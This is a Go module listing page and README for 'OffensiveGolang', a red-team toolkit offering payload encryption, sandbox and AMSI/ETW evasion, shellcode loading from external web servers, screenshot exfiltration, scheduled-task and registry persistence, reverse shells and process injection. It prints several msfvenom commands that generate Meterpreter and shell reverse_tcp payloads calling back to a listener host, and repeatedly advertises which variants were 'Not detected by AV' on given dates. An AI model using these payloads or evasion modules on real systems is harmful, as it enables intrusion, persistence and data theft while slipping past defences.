OffensiveGolang

module

v0.2.1 Latest Latest Go to latest Published: Oct 27, 2024 License: GPL-3.0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/MrTuxx/OffensiveGolang

Links

Open Source Insights

README ¶

OffensiveGolang

OffensiveGolang is a collection of offensive Go packs inspired by different repositories. Ideas have been taken from OffensiveGoLang and Ben Kurtz's DEFCON 29 talk.

This repository has some basic implementations and examples that depending on the environment in which they are used can be easily detected by defensive systems. The goal is to support the rapid development of red team tools by providing common functions and with the possibility of improvements by the community. The different modules presented are the following:

The different modules presented are the following:

Encryption: Module that allows encrypting the payload shellcode using AES and a 32-byte random key.
Evasion: Based on other projects such as robotgo, functions have been implemented that identify screen dimensions, mouse movements and process information in order to avoid the execution of binaries in sandboxes.
Exfil: Implements functions that allow loading the shellcode from an external web server or sending a screenshot after having used the screenshot method through a POST request.
Persistence: Allows you to create a scheduled task using the methods provided by the taskmaster project. In addition, you can also modify the Windows registry to run a binary at startup.
Payloads: set of methods collected from different repositories that allow from generating a simple reverse shell in Golang to injecting code into the memory of an existing process.
Examples: Different examples using the modules described above.

Installation 🛠

go get github.com/MrTuxx/OffensiveGolang

Linux

Installation of dependencies

$ sudo apt install xsel xclip gcc libc6-dev libx11-dev xorg-dev libxtst-dev libpng++-dev xcb libxcb-xkb-dev x11-xkb-utils libx11-xcb-dev libxkbcommon-x11-dev libxkbcommon-dev gcc-multilib gcc-mingw-w64 libz-mingw-w64-dev

Windows

Install Mingw64 and ZLIBx64
- Extensive Guide: https://github.com/lowkey42/MagnumOpus/wiki/TDM-GCC-Mingw64-Installation

Download and install TDM GCC Mingw64 add \TDM\bin to PATH
Download and unzip ZLIBx64
copy _\zlib\bin to \TDM\bin
copy \zlib\include to \TDM\include
copy \zlib\lib to \TDM\lib

Basic Examples 🚀

Fiber

Portable Executable (PE)

Meterpreter Staged Payload downladed from external web server with Evasion and Encryption Module implemented. (UPDATE: Not detected by AV as of 23/05/2024)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.145 -o /tmp/payload.txt -b "\x00" EXITFUNC=thread LPORT=443 -f c

Video Demo

Ekko

Portable Executable (PE)

Simple Go Reverse Shell applying the Ekko Technique. (UPDATE: Not detected by AV as of 23/05/2024)

Video Demo

AMSI ByPass

AMSI ByPass with malicious dll using rundll32.exe (UPDATE: Not detected by AV as of 23/05/2024)

Simple Go Reverse Shell

Simple Golang connection (UPDATE: Not detected by AV as of 19/03/2022)

Simple Go Reverse Shell in a dll

Simple Golang connection (UPDATE: Not detected by AV as of 19/03/2022)

CreateThread

Dynamic link library (DLL)

Meterpreter Staged Payload with Encryption Module implemented. (UPDATE: Not detected by AV as of 19/03/2022)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.21 -o /opt/Offensive-Golang/payload.txt -b "\x00" EXITFUNC=thread LPORT=443 -f c --smallest

NOTE: Some msf commands trigger the AV

Portable Executable (PE)

Meterpreter Staged Payload with Evasion and Encryption Module implemented. (UPDATE: Detected by AV as of 19/03/2022)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.21 -o /opt/Offensive-Golang/payload.txt -b "\x00" EXITFUNC=thread LPORT=443 -f c --smallest

Reverse Shell Staged Payload with Evasion and Encryption Module implemented.(UPDATE: Not detected by AV as of 19/03/2022)

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.21 -o /opt/Offensive-Golang/payload2.txt -b "\x00" EXITFUNC=thread LPORT=443 -f c --smallest

RemoteThread

Dynamic link library (DLL)

Reverse Shell Staged Payload downladed from external web server with Evasion and Encryption Module implemented. (UPDATE: Not detected by AV as of 19/03/2022)

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.21 -o /opt/Offensive-Golang/payload2.txt -b "\x00" EXITFUNC=thread LPORT=443 -f c --smallest

Portable Executable (PE)

Meterpreter Staged Payload downladed from external web server with Evasion and Encryption Module implemented. (UPDATE: Not detected by AV as of 19/03/2022)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.21 -o /opt/Offensive-Golang/payload.txt -b "\x00" EXITFUNC=thread LPORT=443 -f c --smallest

NOTE: Some msf commands trigger the AV

Syscall

Dynamic link library (DLL)

Meterpreter Staged Payload with Evasion Module implemented. (UPDATE: Not detected by AV as of 19/03/2022)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.21 -o /opt/Offensive-Golang/payload.txt -b "\x00" EXITFUNC=thread LPORT=443 -f c --smallest

Portable Executable (PE)

Meterpreter Staged Payload downladed from external web server with Evasion and Encryption Module implemented. (UPDATE: Detected by AV as of 19/03/2022)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.21 -o /opt/Offensive-Golang/payload.txt -b "\x00" EXITFUNC=thread LPORT=443 -f c --smallest

Reverse Shell Staged Payload downladed from external web server with Evasion and Encryption Module implemented. (UPDATE: Not detected by AV as of 19/03/2022)

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.21 -o /opt/Offensive-Golang/payload2.txt -b "\x00" EXITFUNC=thread LPORT=443 -f c --smallest

Persistence

Task scheduled with malicious dll using syscall

References 📚

Directories ¶

Path	Synopsis
cmd
examples
c2/createThread_dll
c2/createThread_pe
c2/earlyInjection_dll
c2/earlyInjection_pe
c2/ekko_pe
c2/fibers_dll
c2/fibers_pe
c2/remoteThread_dll
c2/remoteThread_pe
c2/syscall_dll
c2/syscall_pe
cmd_dll
evasion/amsi_dll
evasion/amsi_pe
evasion/etw_dll
evasion/etw_pe
exfil/exfil_teams
persistence/registry
persistence/task_dll
persistence/task_pe
reverse_shell
reverse_shell_dll
pkg
encryption
evasion
exfil
payloads/injections/EarlyInjection
payloads/injections/createThread
payloads/injections/fibers/fibers_v1
payloads/injections/fibers/fibers_v2
payloads/injections/remoteThread
payloads/injections/syscall
payloads/rev_shell/rev_shell
payloads/rev_shell/rev_shell_dll
persistence

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL